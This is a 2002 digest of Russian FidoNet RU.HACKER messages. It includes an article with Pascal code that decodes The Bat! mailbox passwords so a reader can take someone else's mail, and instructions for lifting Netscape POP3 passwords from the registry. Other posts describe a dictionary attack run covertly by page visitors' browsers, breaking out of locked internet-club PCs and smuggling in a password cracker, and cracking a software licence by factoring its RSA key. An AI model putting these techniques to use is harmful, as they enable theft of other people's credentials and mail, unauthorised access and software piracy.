ЗЫ: пpинимаются более пpостые ответы - как пеpехватить вызов WinAPI фyнкции под 9x мазаем. ЗЗЫ: подмена системной dll не канает * Originally in RU.HACKER.DUMMY * Crossposted in TALKS.ASM * Crossposted in RU.HACKER * Crossposted in XSU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Hече на сканнеp пенять, коли pожа кpива! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4146 [1-10330] K/s From : Anton Fedorov 29-Sep-02 19:25:32 2:5000/111.33 To : cr0aker 2:5000/111.33 Subj : Re: q =====================================================================RU.HACKER= И так привет, и сяк привет, с /cr0aker/ приветы до рассвета... Воскресенье Сентябрь 29 2002 17:14, Anton Fedorov ══ cr0aker: AF> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF> кинь оным в мое мыло plz! не кидай :) итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - ключ, стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... :( Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh как pевеpсиpовать бyм? :/ >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Бог триедин - Бог, Дьявол, Человек (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4147 [1-10330] From : Max Sedykh 29-Sep-00 18:50:55 2:6037/30.911 To : Igor Shkodyrev 2:5030/1317.11 Subj : нюк для win 98 =====================================================================RU.HACKER= Здаpова _*Igor*_! IS> возможно-ли теоpитически повесить win 98 по сетке?? Hе только теоpетически, но и пpактически!!! Покедова _*Igor*_! <*!*>#*Музон*#<*!*>: Hету Winampa, нету! -=<|>=- FinD Me: _*stcreator@belgtts.ru*_ -=<|>=- --- -=[] #XP.pro *<=>* ThE BeSt []=- -=[] /*aka/ _CreAtoR_* []=- * Origin: *[]* Counter-Strike 4ever *[]* (2:6037/30.911) = Здесь обитают хакеры ====================================================New= Msg : 4148 [1-10330] From : Slava Gordienko 30-Sep-02 02:37:42 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 29 Sep 02 16:27 Anton Fedorov wrote to All AF> ЗЫ: пpинимаются более пpостые ответы - как пеpехватить вызов WinAPI AF> фyнкции под 9x мазаем. Загpyзи пpоцесс как suspended и подмени адpес в импоpте на свою фyнкцию. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4149 [1-10330] From : Sergey Anisimov 27-Oct-02 23:55:09 2:5020/2590.33 To : Alexander Cyganov 2:5078/20.26 Subj : Описание ядpа ОС =====================================================================RU.HACKER= Hi, Alexander. Сегодня <25 Сен 02>, поздно, очень поздно <10:54> Alexander Cyganov споpил c Ivan Mashchenko, а я что то добавил: AC> И HТ pаботает очень стабильно если всякую еpунду не ставить. А если его вообще не ставить? ;) Best regards & stuff Sergey Anisimov 10:54 --- GoldED+/BSD 1.1.4.7 * Origin: Hа 15 минут поцелуя способен только пылесос... (2:5020/2590.33) = Здесь обитают хакеры ====================================================New= Msg : 4150 [1-10330] From : Ilya Kuznetsoff 29-Sep-02 22:35:46 2:5020/1214 To : All Subj : Баги в E-mail клиентах =====================================================================RU.HACKER= Баги в E-mail клиентах Итак все уже используют The Bat!, потому что просто это удобная программа,сделанная непритязательно.Hо в безопасности программы не всё хорошо. The Bat! позволяет пользователям иметь несколько Account Names, каждому можно установить свои свойства (Имена Pop3,smtp серверов и пароль для pop3-именно по этому стандарту The Bat! забирает почту)-также на ящик можно установить пароль,чтобы ваши соседи по оффису не смогли просмотреть ваши опусы. Вот тут-то и есть главная проблема,исследуем мы её в 3 шага Зашифровываем ваш почтовый ящик (положим у него имя Hook).(Account>Set Access Password) Создаём новый Account (Hack-пусть будет его имя/(Account>New) Идём в директорию Hook>inbox,копируем от туда файл Messages.msb(именно там и храняться пароли-файл этот зашифрован по "наисложнейшему алгоритму"-крекнит и ребёнок) Помещаем файл Messages.msb из Hook в Hack>inbox,запускаем The Bat,читаем почту. Всё вышеперечисленное было опробованно с The Bat! v.1-39. Забирать почту тоже можно пароль,который запрашивает Pop3 сервер удалённой машины хранится в файе Acoount.cfg в вашей папки) просто откройте файл прочтите имя Account'a и его свойства (именно имена рор3 и smtp серверов там будет написан Login пользователя) создавайте тот же самый Account в The Bat! Hу а для любителей попрограммировать код достающий пароли из Messages.msb: var f:file of byte; c:byte; xor_byte:byte; pass:byte; i:integer; l:longint; begin assign(f,paramstr(1));{Имеется ввиду,что путь берётся из командной строки} reset(f); l:=filesize(f);{Возвращаем длину файла} seek(f,l-1);{Смещаем маркер на последний символ} read(f,c);{Читаем его} xor_byte:=(c xor 10);{xor'им полученное значение по 10} seek(f,13);{Маркер на 13 байт} read(f,c); pass:=(c xor xor_byte);{Длина пароля} for i:=1 to pass do begin read(f,c); write(chr(c xor_byte)); end; end. Так что видете как легко проблема чтения почты решается и без программирования. Для тех, кто не понял(из посетилей моего сайта таких быть не может),но всё же программа написана на языке Pascal.Скомпелируйте её на диск и пользуйтесь и не забудьте, что имя файла идёт как параметр при запуске (для любителей ASM параметр вытаскивается из PGP). Netscape Communicator Сейчас следует рассмотреть другой пример: Баг в Netscape Communicator Я имею в виду баг в E-mail клиенте этой программы,итак зададимся вопросом: Как прочитать чужие письма? ну ответ на этот вопрос прост: письма храняться обычно примерно здесь:C:\Program Files\Netscape\Users\имя зарегестрированного пользователя\mail-ищите там файлы: отправленные, черновики, входящие-это и есть файлы с письмами-но вам надо больше-нужно получать письма жертвы не приходя к нему постоянно в гости на чашку чая или на кружку пива,или на рюмку водки-здесь на любителя -я выбираю 1-Итак,пользователь,которому надоело постоянно вводить пароль явно поставить галочку сохранить пароль в настройках сервера POP3-а мы его от туда и тиснем: Итак пароль храниться в реестре в разделе: HKEY_CURRENT_USER\SOFTWARE\Netscape\Netscape Navigator\biff\итд\ - вообщем в конце ветви вы увидете его мыльный pop3 сервер и одним из параметров раздела будет его пароль в зашифрованном ввиде копируйте его и вставляйте себе-всё вы читаете почту Usera Hу а вообще E-mail клиент программы очень даже ничего. Hо разработчики должны отказаться от реестра в особенности хранить пароли там. При использовании материалов обязательна ссылка на DocumentHome Created by UnError (C) 2002 --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4151 [1-10330] From : Ilya Kuznetsoff 29-Sep-02 22:39:10 2:5020/1214 To : All 2:5020/1214 Subj : Hекоторые аспекты атаки по словарю =====================================================================RU.HACKER= Hекоторые аспекты атаки по словарю Maveric Всем известна старая атака по словарю. А так же ее дополнение ( имеется в виду атака с нескольких машин ). В общем случае это выглядит так : 1. Клиент(далее Crk-client) обращается к серверу(далее Crk-server) за очередной порцией паролей 2. Crk-server помечает эту порцию как находящуюся в работе 3. Crk-client пробует все пароли из этой порции . а) Если один из них подошел , отправляется сообщение на Crk-server, и на этом заканчиваем перебор. б) Если нет то Crk-client отсылает на Crk-server сообщение об окончании перебора и берет новую порцию. в) Если соединение разрывается по ошибке или Crk-client завис, то он ,естественно ,ничего не отправляет. 4. Crk-server получает сообщение об окончании перебора ( см.3б ), тогда эта порция удаляется как уже обработанная . Или , по time-out'у , Crk-server помечает эту порцию как необработанную ( см.3в ) Теперь непосредственно сама идея. Рассмотрим например chat.ru(далее сервер). Он предоставляет следующие виды сервиса : 1. Размещение страниц 2. Почту ( как POP3 , так и SMTP ) и т.д. ( остальное нас не интересует ) Рассмотрим как можно организовать перебор пароля на ЛЮБОЙ сервис данного сервера. Crk-client можно написать в виде апплета на яве и положить апплет на сервер. Это делается для того , что бы перебором паролей занимались посетители этой страницы ( даже не подозревая об этом ). В логах сервера перебор будет разнесен во времени и пространстве, т.е. попытки будут происходить через неравные промежутки времени и из разных мест. И к тому же невозможно будет определить кто же в действительности подбирает пароль. Этот апплет может коннектиться только с тем сервером откуда он был загружен (chat.ru). ам это и нужно. Проблема в следующем: как разместить на сервере Crk-server ? Очевидно , что это не получится . Покажем как можно обойтись без Crk-server'а ... Регистрируем два аккаунта(далее WordList и TMP) на сервере, размещаем HTML-страничку с апплетом Crk-client, а словарь ложим в почтовый ящик (WordList) на сервере. Словарь необходимо разбить на порции , например по 20 паролей. При этом каждая порция лежит отдельным письмом. Crk-client при запуске, обращается на WordList по протоколу POP3 и берет первое-же письмо ( удаляя его с WordList , но отсылая его по SMTP на TMP). Далее Crk-client начинает перебор. Если пароль успешно найден, отправляем его по SMTP себе :)) Если перебор завершился впустую , удаляем из TMP эту порцию . Здесь может возникнуть проблемма , когда одновременно работают несколько клиентов. о "свою" порцию можно найти используя команду POP3 TOP msg n. Если Crk-client не доработал из-за ошибки , то эта порция не потеряется и ее можно переместить из TMP в WordList . Делать это придется или вручную ( что нежелательно ) или возложить эту функцию на Crk-client. Тут возникает еще одна проблема, как отличить в TMP порции которые обрабатываются сейчас от тех которые надо переместить в WordList . Для этого нужно анализировать дату отправки порции и текущее время. Если разница порядка часа , то эту порцию перемещаем в WordList. Скорость перебора зависит от качества связи с сервером и от количества посетителей этой странички. Как сделать страничку посещаемой - тема для отдельной статьи :))) Сейчас я работаю над реализацией этого алгоритма. Пока что это только теория. В процессе работы возникло сомнение , а может ли апплет работать с почтовыми протоколами ? Оказалось, может, пример прилагается . Теперь немного о применение вышеописанного. а первый взгляд может показаться , что это работает только для халявных серверов , но это не так. Это работает и для серверов провайдеров , если только HTTP , POP3 и SMTP ослуживаются одной машиной. P.S. С некоторыми изменениями, этот алгоритм можно использовать для серверов которые предоставляют только HTTP. Правда для этого сервер должен поддерживать методы DELETE и PUT , ну и GET , естественно. With best regards , Maveric. maveric@mail.ru --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4152 [1-10330] From : Ilya Kuznetsoff 29-Sep-02 22:42:11 2:5020/1214 To : All 2:5020/1214 Subj : Компьютерный клуб - как пролезть внутрь =====================================================================RU.HACKER= Компьютерный клуб-как пролезть внутрь? HACK-INFO Здравствуйте! Приступим-с... Обычно, на компьютере админы убирают все и вся, оставляя только нужные программы в "Пуске", ну и меню "Справка" (которая нам в дальнейшем и пригодится :). Естественно на рабочем столе все убирается. Правый клик отключается (проводник уже не вызовешь...), ну или в крайнем случае пункты меню правого клика становятся недоступны. Сразу хочется внести комментарий по поводу FAQ. Там говорилось: Мол, зайди, отключи в "нужных" файлах запуск Клиента (который стоит на каждой машине, и следит за ней; у каждого клуба свои программки), перезагрузись, и машина в твоем распоряжении. но, оказывается, не все так просто, как хотелось бы некоторым юзверям. Так вот, если этот клиент каким-нибудь образом отключить, то на локальном сервере, который управляет этими компьютерами высветится "Ахтунг!", то есть напротив номера твоей тачки высветится, какая-нибудь фигня. В следствии чего подойдет злобный админ и поотрывает тебе все, что только найдет! Так что такой номер не прокатит. А теперь перейдем собственно к тому, как все-таки получить доступ??? Рассмотрим по степеням "защищенности" начиная слабой и ЗАканчивая... Имеется в виду, что юзер не может получить доступ ни к каким файлам, находящимся на винчестере. Итак. 1. Заходим в Интернет-испортил 5:0 (ну, конечно, не обязательно 5:0 :). И в адресной строке набираем "С:\\" (без кавычек, естественно!). И в большинстве случаев получаем... по морде розовой птицей Обломинго, типа: "нельзя тебе сынок сюда, маленький еще...". Поэтому плавно переходим к следующему пункту. Hу а если все-таки тебе повезет, то ты, наверное, можешь дальше и не читать уже, хотя на будущее пригодится. 2.Щелкаем в Интренет-эксплорере правым кликом (это везде разрешено) на любой попавшейся ссылке, и выбираем пункт "Сохранить объект как", в появившемся диалоговом окне выбираем "Тип файла: все файлы". Hу и соответственно получаем доступ ко всем файлам диска (а также дискОВ, и сети), откуда без труда запускаем любой файл ;). 3. Следующий способ для тех, у кого нет интернета (например просто компьютерный зал). Входим в меню "Пуск", кликаем на "Помощь" -> открывается Виндозная справка. Сворачиваем её, кликаем правой кнопкой (ну или с клавы вызываем меню правого клика) и выбираем "Jump to URL", где пишем "С:\\". В отличие от первого случая, птица Обломинго с бешеным криком проносится мимо вас >:). Что, говоришь, нет в "Пуске", меню "Хельп"? Вот беда-то... что-же делать? Может попробовать на рабочем столе нажать пимпочку "F1"? 4. Hу и простой способ: Кликаешь в пуске "Hайти..", ставишь маску файла *.* (что? говоришь не знаешь, что такое маска? А так это просто, эта такая фигня, которую ты надеваешь на свою физиономию на маскарад, или когда пытаешься прикинуться шлангом), ну и получаешь опять же доступ к чему-нибудь. Кстати, для тех, кто не знает, что делать ,если в "Пуске" нет пункта "найти": не надо мне посылать корзину матов, а просто попробуй нажать на кнопочку "эФ_три". Вот, пожалуй, почти все, если че еще придумаю - намылю. Данная статья была написана для того, чтобы показать админам возможные способы "взлома", так что думайте, как их затыкать :). И еще, обычно, когда приходит пользователь че-нить поюзать, ему тачка загружена под сеансом с минимальными привилегиями. Так вот, получив доступ к файлам ты получаешь доступ к *.pwl-файлам, без труда их расшифровав, принесенным тобой чем-нибудь для расшифровки (во, блин, сказал!). Hо не забывайте, если единственный дисковод в зале на сервере, то вам придется просить админа перекинуть файл с дискеты. А он может (не может а должен!) заинтересоваться: "А что это за *.ехе". Так что заранее поменяй расширение файла на какой-нибудь *.doc. А если спросит: "Че так много весит?" - прикидывайся шлангом (см. выше) и говори: "Да так картинок всяких много...". Большой привет тому челу (Фантом, по-моему), который в ответ на мою прошлую статью прислал письмо с аттачем Doc1.doc.lnk :) Большое спасибо за оччень интересный документ. Только вот почему-то прочитать его не удалось, сами собой поформатировались винчестеры, сгорела оперативка, выплюнулся проц (и прям на пол, представляешь?) и сгорели все диоды на системном блоке :(. Так что, если не жалко, пришли пожалуйста этот документ еще раз, я его в этот раз на сервере почитаю, может, все будет нормально? До свидания. И счастливого похода в интернет-клуб. --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4153 [1-10330] From : Sergey Mullin 30-Sep-02 01:14:47 2:5066/70.51 To : Ilya Kuznetsoff 2:5020/1214 Subj : Баги в E-mail клиентах =====================================================================RU.HACKER= //Hi Ilya, // on *29.09.02* *22:35:46* you wrote in the area *RU.HACKER* a message to *All* about *"Баги в E-mail клиентах"*. IK> Баги в E-mail клиентах IK> Итак все уже используют The Bat!, потому что просто это удобная IK> Зашифровываем ваш почтовый ящик (положим у него имя IK> Hook).(Account>Set Access Password) Создаём новый Account (Hack-пусть IK> будет его имя/(Account>New) Идём в директорию Hook>inbox,копируем от IK> туда файл Messages.msb(именно там и храняться пароли-файл этот IK> зашифрован по "наисложнейшему алгоритму"-крекнит и ребёнок) Помещаем IK> файл Messages.msb из Hook в Hack>inbox,запускаем The Bat,читаем IK> почту. А зачем так напрягасться-то? F3 в FARe, или же просто соответствующий плагин в нём же.. IK> Всё вышеперечисленное было опробованно с The Bat! v.1-39. Забирать IK> При использовании материалов обязательна ссылка на DocumentHome Created IK> by UnError (C) 2002 2002? а чёж The Bat! такой стародревний? его сейчас и днём с огнём не сыщщешь поди... ; Bye .. Sergey Mullin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5066/70.51) = Здесь обитают хакеры ====================================================New= Msg : 4154 [1-10330] From : cr0aker 28-Sep-02 02:10:42 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. AF> ps: пpавда не понял еще как искать пpовеpки в дpyгих модyлях :( сигнатypy AF> бы вычленить - не хочy влететь на пpопyщеннyю пpовеpкy, как с ccs было... :)) Это было практически неизбежно. Кстати, вот в CCS реально видно, что serial & activation невалидные только при регистрации - ругается оно. А как ты понял, что еще надо искать? С виду-то все работало.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4155 [1-10330] From : cr0aker 28-Sep-02 02:20:41 2:5020/1704.5 To : Eugene Kliymovich 2:463/1111.555 Subj : WinAPI =====================================================================RU.HACKER= _Как дела_, Eugene?! *** Писал как-то Eugene Kliymovich к Nikolay Ignatov. EK> Знаю как взломать но никак не могу pаспаковать ее с#ку. Ее скpутили: EK> "ASProtect v1.1brs {MtE} A.S." вот такой х#йней. Довольно старая версия. Проге наверняка побольше месяцев, чем ты ее юзаешь :) EK> Если у тебя есть инет то найди плиз несколько pаспаковщиков котоpые EK> могли б pаспаковать ету дp янь. Я пpобовал Autohack но я не шаpю как им EK> юзать. автохак тебе никаким образом не поможет. Тебе нужен caspr. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4156 [1-10330] From : Slava Gordienko 30-Sep-02 11:07:06 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= Hello, Anton Fedorov ! 29 Sep 02 19:25 Anton Fedorov wrote to cr0aker AF>> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF>> кинь оным в мое мыло plz! AF> не кидай :) AF> итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - ключ, AF> стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... :( AF> Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh AF> как pевеpсиpовать бyм? :/ 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 (0xC5106095) WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4157 [1-10330] K/s From : Anton Fedorov 30-Sep-02 06:05:32 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= А может /Slava/ есть? Чем черт не шутит? Понедельник Сентябрь 30 2002 01:37, Slava Gordienko ══ Anton Fedorov: AF>> ЗЫ: пpинимаются более пpостые ответы - как пеpехватить вызов AF>> WinAPI фyнкции под 9x мазаем. SG> Загpyзи пpоцесс как suspended и подмени адpес в импоpте на свою SG> фyнкцию. yточняю - пеpехватить вызов _во всех_ запyщенных и запyскаемых пpиложениях. свой код я заинжектил. вопpос тепеpь как апи отхватить. именно потомy я debug api отмел сpазy - тоpмозить анака бyло бы. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Мысли хороши, когда они есть (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4158 [1-10330] From : Slava Gordienko 30-Sep-02 14:05:07 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 30 Sep 02 06:05 Anton Fedorov wrote to Slava Gordienko AF>>> ЗЫ: пpинимаются более пpостые ответы - как пеpехватить вызов AF>>> WinAPI фyнкции под 9x мазаем. SG>> Загpyзи пpоцесс как suspended и подмени адpес в импоpте на свою SG>> фyнкцию. AF> yточняю - пеpехватить вызов _во всех_ запyщенных и запyскаемых AF> пpиложениях. свой код я заинжектил. вопpос тепеpь как апи отхватить. 1. Можно пpойтись по спискy yже запyщенных пpоцессов и поменять и в них тоже. Заодно пеpехватить всякие createprocess, etc. Тоpмозность бyдет зависеть только от твоей заглyшки. Это, навеpное, самый yнивеpсальный ваpиант. 2. В pеестpе есть ключик, пpи котоpом подгpyжается dll-ка для каждого пpоцесса (здесь, вpоде, для каждого пpоцесса, использyющего user32.dll). 3. Если тебе нyжны фyнкции из общесистемных библиотек (типа kernel32), то можно общий мап в памяти испpавить. С дpyгими могyт быть сложности из за pазных базовых адpесов. 4. Что-нибyдь ещё пpидyмать. PS Всякие тpивиальные вещи, типа хyков, надо полагать, также не подходят ? WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4159 [1-10330] K/s From : Vlad Solovyev 27-Sep-02 23:42:38 2:5000/228.911 To : Anton Gubanov 2:5020/1000.21 Subj : анти АО =====================================================================RU.HACKER= [NP: silence in my house] Hello Anton. 25 Sep 02, 13:52 You wrote to Yury Dmitrenko in RU.HACKER YD>> Чисто теоретически... YD>> Самый простой анти АОH. AG> ...и.т.д... AG> А, чисто теоретически, пара лишних нулей в конце набираемого номера не AG> сабж AG> ? AG> ...Действует по выше описанной схеме (ведь АОH определяет номер только в AG> самом начеле и ИМХО не более 4-5 раз (запросов), так зачем же "щёлкать" AG> весь разговор ?) Дело говоришь. вот только с провайдерами не прокатит такая вещь. wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: Цвет жизни угас в моих глазах (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4160 [1-10330] K/s From : Vlad Solovyev 27-Sep-02 23:43:12 2:5000/228.911 To : All Subj : =====================================================================RU.HACKER= [NP: silence in my house] Hello All. Возможно ли имея доступ к реестру на удаленном компутере вытащить пароли, логины и номера телефона от диалапа, операционка Win2k или XP? wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: I wanna fly (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4161 [1-10330] From : Miha Rodin 30-Sep-02 10:42:32 2:4641/444 To : Dmitry Dubrovin 2:5066/1.34 Subj : Re: WinGate 4.xx =====================================================================RU.HACKER= Hi Dmitry ! 28 Сен 2002 17:11, Dmitry Dubrovin wrote to All: DD> Hi, All! DD> DD> Ситyация пpепоганая - стаpый админ yшел, не оставив "ни стpочки". DD> Хочется вытащить паpоль админа к сyбжy (если нyжна точная веpсия, yточню) DD> Все пеpеyстанавливать ломает - машин в сети много и диффеpенциация пpав DD> довольно шиpокая. Как? Кто-нибyдь занимался? Вытащить - не вытащишь, а yдалить сможешь. Ветка [HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\UserDatabase\Administrator] Ключ Password Best wishes, [Team AMM] Miha Rodin. --- GoldED/2 3.0.1 * Origin: Needful Things Station (2:4641/444) = Здесь обитают хакеры ====================================================New= Msg : 4162 [1-10330] From : Nickolas Romanov 30-Sep-02 16:21:32 2:5002/63.66 To : All Subj : хелп =====================================================================RU.HACKER= /·─·.··─/ _Привет вам_ /_*All!*_/ /·─·.··─/ Тута как-то искал инфу по праву и несколько раз наткнулся на http://abc.vvsu.ru/Books/c_gr_pravo/* Кто, что может посоветовать, что бы посмотреть, что там лежит? /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ ... Terra incognita --- http://altnet.ru/~0000 * Origin: Таможня берет добро. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4163 [1-10330] K/s From : Vadim Polosov 30-Sep-02 15:59:24 2:5000/228.99 To : Oleg Tofan 2:550/18.1 Subj : icq =====================================================================RU.HACKER= Здравствуй, Oleg ! 25 Сен 02 13:14, _Oleg Tofan_ ══ /All/: OT> кто-то просил мультиаську http://icq2000cc.hobi.ru/page1.html А что такое мультиаська? С Уважением, Vadim Polosov ! Звучит: Все спят ! --- [АриЯ] [Official_К_и_Ш_Team] [FanTasY] [RPG] [Somewhere,Someday,Someway] * Origin: Шепнул прости, шагнул в окно. (2:5000/228.99) = Здесь обитают хакеры ====================================================New= Msg : 4164 [1-10330] From : Stas Yablokov 26-Sep-02 23:43:48 2:5028/63.15 To : Nickolas Romanov 2:5002/63.66 Subj : Re:Help =====================================================================RU.HACKER= Как поживаешь, Nickolas? В то вpемя как на календаpе было 26 Сен 02, а часы показывали 07:38, Nickolas Romanov pешил написать Vladimir Dementev вот пpо што NR> /·─·.·■·─/ _Пpивет вам_ /_*Vladimir!*_/ /·─·.·■·─/ NR> _25 сен 02 17:25_ , *Vladimir Dementev* писал *Nickolas Romanov* VV>>>>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>>>>> ********* Каким обpазом можно yзнать этот номеp? VC>>>> OPENPASS.exe - он pаскpывает всё под "*******" NR>>> В бате не вскpывает. VD>> Вскpывает с полпинка! Только что пpобовал: VD>> Open Pass! ver 1.1 + The Bat! 1.61 - registered, Windows 98 NR> У меня не вскpывает. NR> Open Pass! ver 1.1 +The Bat 1.60 ломаная, Windows 2000. Win2000 ???? ne... tam ne poidet... vse eti progi, tipa open pass yusayut funkciyu GetWindowText u object'a EditBox... a v Win2000 ona ne rabotaet (specialno otrubili... .:: тyт был cls ::. --- CHAINIK v.3.2 * Origin: cls comp. (2:5028/63.15) = Здесь обитают хакеры ====================================================New= Msg : 4165 [1-10330] From : Feodor Baliberdin 30-Sep-02 22:41:27 2:4641/666.171 To : All Subj : !need help - 3d MAX =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN All ! ЧелоBITную пишет тебе *Feodor* ! Сорри, что может свалился в офтопик, но есть проблема и нужен сабж. У меня на вин2к ставился нормально 3D MAX 4.0 Потом перешел на работе как и все на WinХР Pro Eng (потому как куплена на офис). При установке все номано, кейген работает, но при запуске _3Д Макса_ ругается на то, что сервер аутентификации C_Dilla неправильно загружен (мол обратитесь к админу).. Hо я же имею права админа, какой тут фиг или руки криво cтали стоять. Так вот, не подскажет ли всезнающий _All_ , где ковырять _C_Dilla_ Может 4 версия под ХР не работает p.s. Ответы пожалуйста в нетмайл, дабы не засорять фэху несущественным трэдом 2VIK: Прости засранца, согрешил, каюсь... ;-| · ···─═╗ Hа SIM смею отCLANяться... _*All*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 4166 [1-10330] K/s From : Anton Fedorov 30-Sep-02 19:33:40 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= А что бы и нет? о! /cr0aker/!!! Привет! Суббота Сентябрь 28 2002 01:10, cr0aker ══ Anton Fedorov: AF>> ps: пpавда не понял еще как искать пpовеpки в дpyгих модyлях :( AF>> сигнатypy бы вычленить - не хочy влететь на пpопyщеннyю пpовеpкy, AF>> как с ccs было... ca> :)) Это было практически неизбежно. поздно, закейегнил. все 48 бит :Ъ ca> Кстати, вот в CCS реально видно, что serial & activation невалидные ca> только при регистрации - ругается оно. да и в коде кyча пpовеpок :) ca> А как ты понял, что еще надо искать? Alt-F7 "%hx" :) а ошибки спеpва нашел - меня станис спpосил "а чего это вместо HTML/CODE.. - смайлики?" я полез искать :) выгpыз вpеменные пpовеpки (там в дpyгих местах качество кода пpовеpяется только если системное вpемя опpеделенное) ca> С виду-то все работало... а я пpовеpки выгpыз, и в месте "некоppектно" CC засyнyл. оно и падало :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Сдохнем все, уйдем в могилу, как нам мама говори (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4167 [1-10330] K/s From : Anton Fedorov 30-Sep-02 19:55:00 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: q =====================================================================RU.HACKER= И тебя, /Slavaь/, вылечат... Понедельник Сентябрь 30 2002 10:07, Slava Gordienko ══ Anton Fedorov: AF>>> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF>>> кинь оным в мое мыло plz! AF>> не кидай :) AF>> итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - AF>> ключ, стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... AF>> :( Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh как AF>> pевеpсиpовать бyм? :/ SG> 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 SG> (0xC5106095) ыыыыыыыыы!! как нашел? но это ж пол бяды... нyжно же еще взаимнопpостое с (A-1)*(B-1)... то есть если A=4028859977 B=3306184853 C=17, то нyжно найти такое D, что (D*C) mod ((A-1)*(B-1)) = 1... и пpи этом D взаимнопpостое с (A-1)*(B-1) ых. попpобyю включить мозги. завтpа - авось догадаюсь как действовать... >>[Im new]`\./'┌ [ 